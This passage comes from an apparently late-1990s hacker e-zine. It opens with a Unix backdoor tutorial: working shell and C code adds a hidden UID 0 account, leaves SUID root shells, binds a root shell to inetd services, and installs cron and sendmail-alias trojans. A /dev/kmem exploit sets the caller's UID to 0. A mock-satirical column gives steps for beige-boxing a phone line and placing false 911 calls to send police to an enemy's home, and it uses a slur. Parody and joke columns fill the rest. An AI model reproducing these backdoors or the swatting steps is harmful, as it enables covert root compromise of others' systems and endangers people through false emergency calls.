linecount = `wc -l /etc/passwd` cd # Do this at home. cp /etc/passwd ./temppass # Safety first. echo passwd file has $linecount[1] lines. @ linecount[1] /= 2 @ linecount[1] += 1 # we only want 2 temp files echo Creating two files, $linecount[1] lines each \(or approximately that\). split -$linecount[1] ./temppass # passwd string optional echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa cat ./xab >> ./xaa mv ./xaa /etc/passwd chmod 644 /etc/passwd # or whatever it was beforehand rm ./xa* ./temppass echo Done... NEVER, EVER, change the root password. The reasons are obvious. [2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somwhere buried deep in the passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second field). [3] Leave an SUID root shell in /tmp. #!/bin/sh # Everyone's favorite... cp /bin/csh /tmp/.evilnaughtyshell # Don't name it that... chmod 4755 /tmp/.evilnaughtyshell Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may notice...but, hey, this *is* the overt section....). I will not detail the changes neccessary because they can be quite system specific. Check out /var/spool/cron/crontabs/root and /etc/fstab. _________________________________________________________________ The Veiled [4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the appropriate program (usally a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical lines look like this: (1) (2) (3) (4) (5) (6) (7) ftp stream tcp nowait root /usr/etc/ftpd ftpd talk dgram udp wait root /usr/etc/ntalkd ntalkd Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect. TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more inportantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual command (and optional arguments). If the program is trivial (usally requiring no user interaction) inetd may handle it internally. This is done with an 'internal' flag in fields (6) and (7). So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd file, etc... For the insinuation-impaired, try this: Open the /etc/inetd.conf in an available editor. Find the line that reads: daytime stream tcp nowait root internal and change it to: daytime stream tcp nowait /bin/sh sh -i. You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interuppt ALL network connections (so it is a good idea to do this off peak hours). [5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One simple solution is to set up a shell the runs similar to the above backdoor. You need to make sure the entry appears in /etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple: (1) (2)/(3) (4) smtp 25/tcp mail Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name associated with the service. For instance, add this line to /etc/services: evil 22/tcp evil and this line to /etc/inetd.conf: evil stream tcp nowait /bin/sh sh -i Restart inetd as before. Note: Potentially, these are a VERY powerful backdoors. They not only offer local rentry from any account on the system, they offer rentry from *any* account on *any* computer on the Internet. [6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usally located. Here, you have several options. I will list a only few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon. It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove, or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab entry has six fields: (1) (2) (3) (4) (5) (6) 0 0 * * 1 /usr/bin/updatedb Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week (0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron, simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the /etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your shady intentions). Add this line to /var/spool/crontab/root: 0 0 * * * /usr/bin/trojancode This is the shell script: #!/bin/csh # Is our eviluser still on the system? Let's make sure he is. #daemon9@netcom.com set evilflag = (`grep eviluser /etc/passwd`) if($#evilflag == 0) then # Is he there? set linecount = `wc -l /etc/passwd` cd # Do this at home. cp /etc/passwd ./temppass # Safety first. @ linecount[1] /= 2 @ linecount[1] += 1 # we only want 2 temp files split -$linecount[1] ./temppass # passwd string optional echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa cat ./xab >> ./xaa mv ./xaa /etc/passwd chmod 644 /etc/passwd # or whatever it was beforehand rm ./xa* ./temppass echo Done... else endif [7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the /etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!). Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything would be ok. Add this line to root's crontab file: 29 2 * * * /bin/usr/sneakysneaky_passwd make sure this exists: #echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.sneaky and this is the simple shell script: #!/bin/csh # Install trojan /etc/passwd file for one minute #daemon9@netcom.com cp /etc/passwd /etc/.temppass cp /var/spool/mail/.sneaky /etc/passwd sleep 60 mv /etc/.temppass /etc/passwd [8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is. Make sure it runs as root. Name it something innocous. Hide it well. /* A little trojan to create an SUID root shell, if the proper argument is given. C code, rather than shell to hide obvious it's effects. */ /* daemon9@netcom.com */ #include #define KEYWORD "industry3" #define BUFFERSIZE 10 int main(argc, argv) int argc; char *argv[];{ int i=0; if(argv[1]){ /* we've got an argument, is it the keyword? */ if(!(strcmp(KEYWORD,argv[1]))){ /* This is the trojan part. */ system("cp /bin/csh /bin/.swp121"); system("chown root /bin/.swp121"); system("chmod 4755 /bin/.swp121"); } } /* Put your possibly system specific trojan messages here */ /* Let's look like we're doing something... */ printf("Sychronizing bitmap image records."); /* system("ls -alR / >& /dev/null > /dev/null&); */ for(;i [9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line: "decode: "|/usr/bin/uudecode" to the /etc/aliases file. Usally, you would then create a uuencoded .rhosts file with the full pathname embedded. #! /bin/csh # Create our .rhosts file. Note this will output to stdout. echo "+ +" > tmpfile /usr/bin/uuencode tmpfile /root/.rhosts Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the .rhosts file. For a one liner (not faked, however) do this: %echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@target.com You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your choosing. Many of the previous scripts and methods can be employed here. __________________________________________________________________________ The Covert [10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such tripwire. The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in this case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with thier sourcecode.) Since the code is very lengthy and different for many flavors, I will just include basic psuedo-code: get input; if input is special hardcoded flag, spawn evil trojan; else if input is valid, continue; else quit with error; ... Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code. __________________________________________________________________________ The Esoteric [11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps it's parameters in memory, it is possible to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of your current process, then spawn a csh, which will inherit this UID. The following program does just that. /* If /kmem is is readable and writable, this program will change the user's UID and GID to 0. */ /* This code originally appeared in "UNIX security: A practical tutorial" with some modifications by daemon9@netcom.com */ #include #include #include #include #include #include #include #define KEYWORD "nomenclature1" struct user userpage; long address(), userlocation; int main(argc, argv, envp) int argc; char *argv[], *envp[];{ int count, fd; long where, lseek(); if(argv[1]){ /* we've got an argument, is it the keyword? */ if(!(strcmp(KEYWORD,argv[1]))){ fd=(open("/dev/kmem",O_RDWR); if(fd #include #include #define LNULL ((LDFILE *)0) long address(){ LDFILE *object; SYMENT symbol; long idx=0; object=ldopen("/unix",LNULL); if(!object){ fprintf(stderr,"Cannot open /unix.\n"); exit(50); } for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){ if(!strcmp("_u",ldgetname(object,&symbol))){ fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_val ue); ldclose(object); return(symbol.n_value); } } fprintf(stderr,"Cannot read symbol table in /unix.\n"); exit(60); } [12] Since the previous code requires /dev/kmem to be world accessable, and this is not likely a natural event, we need to take care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a discrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]: chmod 666 /dev/kmem sleep 300 # Nap for 5 minutes chmod 600 /dev/kmem # Or whatever it was before ______________________________________________________________________________ 666666666666666666666666666666666666666666666666666666666666666666666666666666 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| HAQING 10-10-321 |BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: S1l3nt K0ur13r *BoW BoW BoW BoW BoW Bo ============================================================================== R0q 0n $@#$@# R4m 1t d0wn and sh0v3 it up $@# Phear th3 st33l HST of BoW az it m0ws u d0wn 0n th3 inf0rmat10n sup3rhighway. R u d0wn ?! Kuz h3r3 k0m3z th3 A-K AZKII SPR4Y $$@#!$# BoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoW BoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoW BoW BoW BoW HaQing 10-10-321 BoW BoW by: S1l3nt K0ur13r BoW BoW BoW BoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoW BoW ]--]===BoW===]---- BoW BoW W4r3z 1nj3kt3d BoW BoW H1gh 0ct4n3 BoW BoW m0th3r Fuqr BoW BoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoW BoWBoW..........Phear BoW...........BoWBoW BoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoW St3p 0n3: KN0w th3 k0d3 @$$#$@ B3f0re y0u b3g1n haq1ng, it is important that y0u mem0rize the following k0de: 10-10-321 (T3n T3n Thr33 Tw0 0n3, pl3as3 ign0re th3 dazh3s) 1t fl0wz 0ff th3 t0ngue l1ke l3ach axs 0n ur fav0urite w4r3z BB$. St3p Tw0: Th1ngz y0u w1ll n33d: 1) b31g3 b0x 2) Axs t0 junct10n b0x 0f sTup1d m1ddl3 kl4zz 1d10t v1kt1m. 3) "EYE PHEAR BoW" t-sh1rt (non-0ptional) 4) eff1gy 0f Gen3 Spaff0rd to l34ve h4nging bY junct10n b0x (w4rdz 3n3my Haqrs away fr0m ur jUnct10n b0x) 5) p0zter 0f tsut0uma sh1m0m0ura t0 d00dle 0n. (opt10nal) 6) bUzh t0 h1d3 b3h1nd. St3p Thr33: H4ck1ng w1th 10-10-321: Sn34k 0ut t0 jUnct10n b0x sn00p3d 0ut and l0cat3d dUr1ng the pr3pat0ry w0rk 1n st3p 0ne. Pr3f3rably d0 th1z 1n th3 evening s0 y0u k4n m0ve by cl0ak 0f n1ght, und3t3cted by y0ur ch0sen enemy. G3t c0mf0rtable behind bUzhes s0 y0u are 1n a c0mf0rtable p0sition t0 d0 y0ur w0rk. If you have th3 t1me: perf0rm the relaxat10n ritual outlined in BoW #3. N0w y0u are ready $@#$#@ R3m0ve the c0ver off of the junct10n b0x and l0cate y0ur targ3t line, if y0u d0 n0t kn0w h0w to do this u are a fagg0t w4nn4b3 and y0u sh0uld st1ck t0 h4cking p0p mach1n3z. 10-10-321 1z f0r m3n $#$@# 0nce y0u have l0cat3d the target l1ne to jack into, cl1p onto it w1th the alligat0r cl1pz c0ming out of y0ur b31ge box. (see diagram b3l0w.) Y0u sh0uld n0w rece1ve d1altone 0n ur be1ge b0x, if y0u d0 n0t y0u mUzt h4ve fucked s0mething up and sh0uld g0 rent s0me anth0ny r0bbinz v1deoz. If y0u d0 receive dialt0ne y0u are n0w ready t0 perf0rm th3 d33d. D1al the f0ll0wing: 10-10-321-911 # Wh3n th3 3m3rg3ncy service answ3rz skream inc0herently int0 the ph0ne ab0ut du0dz in trenchc0atz f1r1ng semi-aut0matic weap0nz at y0u. M4ke sure t0 make reference to Gene Spaff0rd and Dale Drew, th1z will thr0w them 0ff 0f y0ur trail. Th3 emergency crews (ie: p0lice, firetrucks, narqs) sh0uld b w3ll on their way to y0ur targ3tz h0me l0ng b4 y0u even hang up. N0w it iz rec0mm3nded that y0u setup a c0nf. Dial th3 f0ll0wing: 10-10-321-700-456-1000 Y0u are n0w dialing alliance telec0nferencing wh1le diverting y0ur call thr0ugh 10-10-321. Kn0w the k0d3 @$@#$@# N0w f0ll0w the pr0mpts and mak3 sure t0 p0und in all y0ur k-k0ol friends int0 the conferenc3. Y0ur c0nvenient c0ver behind th3 bUzh3s w1ll pr0vide excell3nt vantage p0int t0 b0th enj0y ur c0nf3r3nc3 fr0m and a gr34t plac3 t0 w4tch all th3 akt10n that y0u have insured will take plac3 at y0ur enemy's h0use when the emergency crews arrive to arr3zt his a$$. If y0u g3t b0red, d00dl3 0n the pikture 0f j4pb0y shim0m0ura pr0cured in st3p tw0. D1agram A: .""""". | u p | <--- Haqr h1d1ng .------. <----- junction b0x 0| " |0 0ut Un1x | SW | \ o / Styl3 | Bell | b31g3 b0x --> .-. | | | | .-----|*| ***. | | .------' |#| ******* | .------' '_' ********* <-- Buzh3s 2 h1d3 | | ******** 1n --------------------------------------------*****----------------------------- W0rd @!$@# Th1z k-k0ol g-f1l3 has b33n br0ught t0 y0u by th3 nUmb3r 9, Th3 L3tt3rz B, o and W and alz0 bY th3 phrase: FUQ YOU $#@$@#$. BoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoW BoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoW BoWBoWBoW S1l3nt K0ur13r BoWBoWBoW BoWBoWBoW [BoW] '99 BoWBoWBoW BoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoW BoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoWBoW ______________________________________________________________________________ 777777777777777777777777777777777777777777777777777777777777777777777777777777 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| HOW TO BE AN ELITE HAQR |BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: so1o [CRH] *BoW BoW BoW BoW BoW Bo ============================================================================== m4ny 0f u k1dz 0ut th3r3 r 0bv10usly k0nfUz3d aZ t0 h0w t0 b a r34lly k00l hAkKr tYp3.. w3ll, 1'v3 d3c1d3d t0 h3lp u l4ym0rZz 0ut w1th th1z v3ry v3ry /<-r4d 4rt1kl3 0n h4ck1ng un1x syst3mz.. h0p3fUlly u w1ll f1nd 1t h3lpfUl wh1l3 expl0r1ng 0n th3 1nph() s00ph3r-h1gHw31gh. sh0uld u enk0unt3r 4ny d1ff1kUlt13z 0r h4v3 aNy kW3zt10nZ, f33l fr33 t0 k0nt4kt m3 v1a t3l3f0n3 @ 44 (0)117 985-7249. (1tz a .uK # wh1ch m4y b l0ng d1st4nc3 ph0r m4ny 0f u amer1k4n h4qrZ.. 1ph u r n0t el3et en0ugh t0 h4v3 k0d3z, f33l fr33 t0 k4ll k0ll3kt, 1 w1ll 4cc3pt ch4rg3z jU$t t0 h4v3 sUm1 t0 t4lk t0). telnet> o ns2.co.uk # th1s 1z my v3ry k-PhR3sh s3kUr1ty k0mp4ny... # sUm d4y w3'll h4v3 cl13ntz Trying 209.203.235.87... Connected to ns2.co.uk Escape character is '^]'. Virtual Server (saturn.exploit.net) # ch3k 0ut mY r4d h0stn4m3!@ login: so1o Password: ant10nl1n3r0x Last login on ttyp7 from dgs.dgsys.com w3lc0m3 t0 th3 jUngl3.. pl3z3 b3h4v3 uRs3lf & d0nt st34l my el1t3 w4r3z. th4nx. -- so1o % whoami so1o % /tmp/.sneaky ; n0t3: th1z bAkd00r t4k3n fr0m daemon9'z art1kl3 ; wh1ch app34rz elsewh3r3 1n th1z issu3.. h3 1z a ; f3ll0w el8 # whoami root ; z3r0-d4y!@$*)( # telnet dgs.dgsys.com ; all h4qrz b0unc3 t0 h1d3 th31r ip & l0ok k001 ; eY3 uz3 th1s s1t3 f0r m0st 0f my h4ck1ng ; 0f .m1lz etc.. f33l fr33 t0 uz3 1t 4ls0, ; th3y'll n3v3r k4tch 0n Trying 204.97.64.1... Connected to dgs.dgsys.com. Escape character is '^]'. UNIX(r) System V Release 4.0 (dgs) login: check_mate ; my k-r4d l0g1n bAkd00r.. ev3ry s1t3 eYe h4k ; eYe uz3 th3 sAm3 l0g1n b1n, th1z 1z g00d kUz ; th4t w4y ey3 d0nt g3t k0nfUz3d & stUph ; th3 alt3rnat1v3z r rshd ; 0r l0g1n aga1n . th1z 1z my fav0r1t3 ; by f4r th0. Last login: Sat May 1 12:19:33 on pts/0 root@dgs:~# ls -la /bin/login -rwx------ 1 root root 46444 May 3 1996 /bin/login root@dgs:~# ls -cl /bin/login -rwx------ 1 root root 46444 Apr 2 13:13 /bin/login ; hmm, our l0g1n bAkd00r s33mz 4 b1t l4rg3.. alz0 th3 ct1m3z r ch4ng3d. ; bUt eYe d0nt th1nk th3y'll n0t1c3... root@dgs:~# cd /dev/.../el8/\ h1dd3n/s3KrUt/z3r0-d4y/uR_g3tt1ng_th3r3/\ k33p_g01ng/alm0Zt_th3r3/wAr3z ; n0w th1z 1z wh3r3 1t g3tz a b1t k0mpl1k4t3d.. hAck1ng n3w s1t3z. ; f1rZt, u mUzt h4v3 tw0 v3ry ess3nt14l el8 x-pl0iTZz wh1ch r ; ast0und1ngly /<-r4d & overwh3lm1ng 1n th31r bUgtr4qn3zZ.. ; th3y r kn0wn aZ 'dropstat' and 'automountdexp.' ; th1z 1z h0w th3y w0rk: root@dgs:~# ./dropstat help.me.im.a.retard.and.this.is.sum.worthless.machine. that.no.one.gives.a.fuck.about.but.i.think.its.cool.to. hack.anything.ending.in.navy.mil rpc.statd located on port 32771 # whoami root ; s33, v3ry s1mpl3! n0w f0r aut0m0untd, th1z 1z a b1t tr1ck13r.. root@dgs:~# ./amountdexp i.own.lame.unpatched.solaris.2.5.boxes.in.the.uk Automountd attack via rpc.statd bouncing Success. ; n0w u mUzt t4k3 a s3k0nd st3p.. th3 expl01t dUz s0m3 w31rd stUph ; aNd m4k3z a r00tsh3ll h4pp3n 0r s0m3th1ng 1ph u t3ln3t t0 p0rt 1524.. root@dgs:~# telnet i.own.lame.unpatched.solaris.2.5.boxes.in.the.uk 1524 Trying 3.1.33.7... Connected to i.own.lame.unpatched.solaris.2.5.boxes.in.the.uk. Escape character is '^].' # ; el1t3 w3 r r00t1n ; th1s als0 cr3at3z sUm w31rd /tmp/bob f1l3, 1m n0t sUr3 wh4t 1tz f0r, ; bUt u k4n jUzt l34v3 1t th3r3.. n01 w1ll 3v3r n0t1c3 w3ll d00dz th4tz b4s1k4lly 4ll th3r3 1z t0 1t.. 1t v4r13z 4 b1t.. th1s wUz 4 sl1ght d3p4rtur3 fr0m th3 n0rm f0r m3 s1nc3 1 usU4lly 0nly h4k l1nux w1th my 0-d4y mountd, ftpd, and imapd w4r3z + my 0wnd/0wnd l0g1n b4kd00r, bUt th3 pr1nc1pl3z r m0stly th3 s4m3. h0p3 u f0und 1t 1nf0rm4t1v3. p34c3 0ut, so1o ______________________________________________________________________________ 888888888888888888888888888888888888888888888888888888888888888888888888888888 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| TH3 3NT3RT41NM3NT K0LUMN |BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: D1str0-D4v3 [BoW/H4G1S] *BoW BoW BoW BoW BoW Bo ============================================================================== Ph1rst there w4s St4r W4r3Zz, Th3 SPA Str1kez B4ck, and R3turn 0f th3 Z3r0d4y, n0w V3lkr0ph1lm studios br1ngZz j00 the m0st 4nt1cip4t3d prequ3l th3 w0rld h4s ever s33n. s3t y0ur ph4z3rz 0n phun f0r: _______.___________. ___ .______ / | | / \ | _ \ | (----`---| |----` / ^ \ | |_) | \ \ | | / /_\ \ | / .----) | | | / _____ \ | |\ \----. |_______/ |__| /__/ \__\ | _| `._____| ____ __ ____ ___ .______ _______ _______. \ \ / \ / / / \ | _ \ | ____| / | \ \/ \/ / / ^ \ | |_) | | |__ | (----` \ / / /_\ \ | / | __| \ \ \ /\ / / _____ \ | |\ \----.| |____.----) | \__/ \__/ /__/ \__\ | _| `._____||_______|_______/ EPISODE 0N3: THE K0URRI3R M3N4C3 "Eye Phear BoW." -- Gene Spafford "One of the year's most Recent films!" -- Leonard Maltin "You'll laugh until you stop!" -- Roger Ebert "I'd say something, but I'm dead" -- Gene Siskel "w0w. I've wasted my life." -- Dale Drew _ \\ <---- l1ght s4b3r \\ \\ _\.//|/._ ------- y0ung j3d1 k0ur13r \\ > < / \\ @ o O @ / \\ | ^ | \\ \ <_> / \\ -___- \\ ___| |___ \\ / --- \ \ \ / /|U$3 TH3 \ \ ---w4r3z dr01d o o______ / / |PH0RC3!| \ \_____oo / C3P0-d4y un1t, (o\ \______/ | | \----- ooo / w1th k-k00l BoW \_\ | | /------\ arch1tectur3!@# |_______| / | | | | \ k4n st0r3 6 |___0___| | O. oo o | terrabytez!@# /) | (\ |----------| | . | | |%%| |&| | *!@ blEeP bl0op.. | / \ | | |%%| | BoW rul3z !** | | | | | * * | | | | | | ::: | The k4st: --------- Chris G0gg4nZ as th3 y0unG LUK3 D0WNL04D3R, a y0ung k0urri3r wh0 is 1gn0r4nt 0f h1s sys0p h3r1t4ge, but h4z th3 sp4rq 1ns1d3 h1m t0 unl34sh th3 unl1m1t3d cr3d1tz th4t k4n s4v3 th3 un1v3rs3. h1z f4th3r l0st h1s l1fe wh3n Luke w4s 4 b4by dur1n4g th3 ph1rst SPA r4id... 0r s0 he th1nkZz. N1ck P0tk4y st4rz 4z th3 imph4m0us N4RQ VAD3R, th3 ev1l l34d3r 0f th3 SPA. B3nt 0n k33p1ng qu4l1ty w4rez 0ut 0f th3 h4ndz 0f th3 pir8 4ll1anc3, N4rq V4d3r w1ll st0p 4t n0th1ng t0 ph0rc3 th3 g4l4xy t0 p4y ph0r th31r 4ppz. b3l13ved t0 h4v3 been th3 1nf0rm4nt t0 th3 FBI th4t r3sult3d in th3 r4id on Luke'z f4rth3r'z cr4ck1ng gr0up, 4nd th3 f0rm1ng 0f th3 SPA. Als0 st4rr1ng G4il Th4ck3r4y 4s th3 b34t1ful Pr1nc3zz Z3r0d4ya, K3v1n M1tn1ck as 0day Want Shen0bi, 4nd 3mm4nu3l g0ldst31n as th3 pl4yful w4r3z-dr0id C3P0-D4Y. F34tur1ng sp3c14l 4pp34r4ncez by tsut0mu sh1m0mur4 4s Japa the Slut 4nd k3v1n P0uls3n 4s K0D4, th3 4g3d k0urr1er m4st3r and pr0vid3r 0f 3l1t3 k0d3z. The St0ry: ---------- th3 adventur3 b3g1nz......... th3 republ1k 0f th3 g4l4ct1k 0rd3r 0f k0ur13rz ass3mbl3 1n 0rd3r 2 0vrthr0w th31r w4r3z-m0ng0r1ng 0pr3ss0rz...th3 SPA. A y0ung d00dl3 b0y by th3 n4me 0f Luke Downl04der 1z k4ll3d t0 th3 c4uz bY a w1$3 0ld BoW af1l by th3 n4me 0f 0day Want Shen0bi. 0day tr41nz y0ung D0wnl04d3r 1n th3 w4yz 0f th3 ph0rc3.. th3 all-enc0mp4$$1ng energy s0urc3 th4t phl0wz thrU th3 s0ul 0f every h4rdk0r3 k0ur13r. w1th th3 ph0rc3 0n ur s1d3 u k4n d0 alm0$t anyth1ng...cr4ck err0r 29...s31ze trunkZ 1n 24 d1ffernt c0untr13z...ev4d3 b4n-k1ckz 0n #hack...g3t uR gr0upz k0py 0f t0mb r41d3r 16 0ut b4 any1 els3!@# aft3r th3 SPA/FBI r41dz 0f th3 k0ur13rz [n4m3d 'th3 cl0ne w4rs'] th3 gr0up c0uld n0 l0ng3r u$e th31r m0t b4gz t0 k4ll b04rdz 1n g3rm4ny. D0wnl04d3r w0uld b th3 l4$t h0pe.... k4n h3 phrEE th3 w4r3z 4 a gener4t10n 0f k1dz ph0rc3d 2 p4y h4rd e4rn3d c4$h 4 th31r w4r3?!@# eye d0n't kn0w du0dz buT eye h0p3 s0...st4y tun3d ph0r th1$ sur3 t0 be ep1c adventur3!@#!@# _.-'~~~~~~`-._ N4rq / || \ V4d3r / || \ "Luk3 my s0n, JoIN tH3 SPA +------> | || | 4nd y0u CaN bE MY c0-SySoP! | _______||_______ | |/ ----- \/ ----- \| Y0u W1Ll NeVeR h4v3 Th3 / (WAREZ) (0-DAY) \ cr3d1tz y0u nEeD t0 l34ch / \ ----- () ----- / \ th3 Z3r0Day 0th3rWiSe!" / \ /||\ / \ / | \ /||||\ / | \ / SPA \ /||||||\ / SPA \ /_ | \o========o/ | _\ `--...__|`-._ _.-'|__...--' `' St4r W4r3z iZ k0pyr1ght 1999 1ndu$tr14l v3lkr0 4nd m4g1k ______________________________________________________________________________ 999999999999999999999999999999999999999999999999999999999999999999999999999999 ______________________________________________________________________________ BoW BoW BoW BoW BoW Bo* *BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo| B1W FIGHTING F0RCE: AN INTRO |BoW BoW BoW BoW BoW Bo W BoW BoW BoW BoW Bo* + ------------------------------ + *BoW BoW BoW BoW BoW BoW BoW BoW BoW BoW Bo* by: The 0wn3d R4ng3r *BoW BoW BoW BoW BoW Bo ============================================================================== B1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1W BOW TH3 BEE 0NE D0UBLE-YEWZ BOW BOW ---[ B 1 W ]--- BOW BOWBOWBOWBOWBOWBOWBOWBOWBOWBOWBOWBOWBOW BOW BY THE 0WN3D R4NGER BOW BOWBOWBOWBOWBOWBOWBOWBOWBOWBOWBOWBOWBOW BOW W4REZ RUSTLER, BOW BOW 0UTL4W K0D3SLINGER BOW BOW H1 Y0 SPLO1TER, AWAY! BOW B1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1WB1W INTRODUCTION: Y0Y0Y0Y0 BITCH3Z!@#$!!@!@@#! TH3 OWN3D RANGER H3R3 W1TH SOME FRESH NEWZ ON THE HOM3FR0NT ABOUT THE M0ST PH34RS0ME FIGHTING F0RCE TO HIT TH3 SC3NE S1NCE JIMMY AND BILLY L33 KICK3D EVERY0N3S ASS IN DOUBL3 DR4GON. BEFOR3 3Y3 KONTINU3, Y0U MAY HAVE N0T1CED TH4T TH1S 4RTIKL3 1S S3T FOR 40 K0LUMNZ. W3LL MY AMIGA G0T FR1ED CUZ EY3 SK0R3D T00 HIGH 0N L3MM1NGZ 4ND IT SH0+ MY F4TT3R AGNUZ CH1P. SO EYE AM PH0RC3D T0 SCR1B3 THIS ON MY C64. BUT TH4T'5 OK CUZ I 4D0R3 MY 64. ANYWAYZ, B4CK T0 TH3 B1W'Z: 1T IS W3LL KN0WN TH4T TH4T TH3 UPP3R ECH3L0NZ OF B0W AR3 PH1LL3D W1TH S00PAH-T0UGH BAD ASS THUGZ. IF U FUCK W1TH BOW, Y0U W1LL PH33L TH3 WR4TH 0F OUR "F1STZ 0F TH3 N0RTHST4R", AND F1ND TH3 B0W K0LL3KT1VE B00T V1OL4T1NG Y0' ASS IN 4 FL4SH. H0W3VER, MY G00D BUDD13 U4EA IS A V3RY BUSY M4N 4ND H4VING TO D1SH 0U+ VI0L3NC3 T0 TH3 L4M3 1Z 4 T1ME- C0NSUM1NG 4ND T3D10UZ T4SK. TH3 S4M3 G03Z F0R TH3 0TH3R 31337 M3MBERZ OF BOW'Z 1NN3R S4NKTUM, WHO H4V3 MUCH B3TT3R TH1NGZ T0 D0 TH4N D34L W1TH N3WB13 D0RKZ WH0 TH1NK TH3Y KAN D1S B0W 4ND L1V3 T0 T3LL TH3 T4LE. TH1S IS 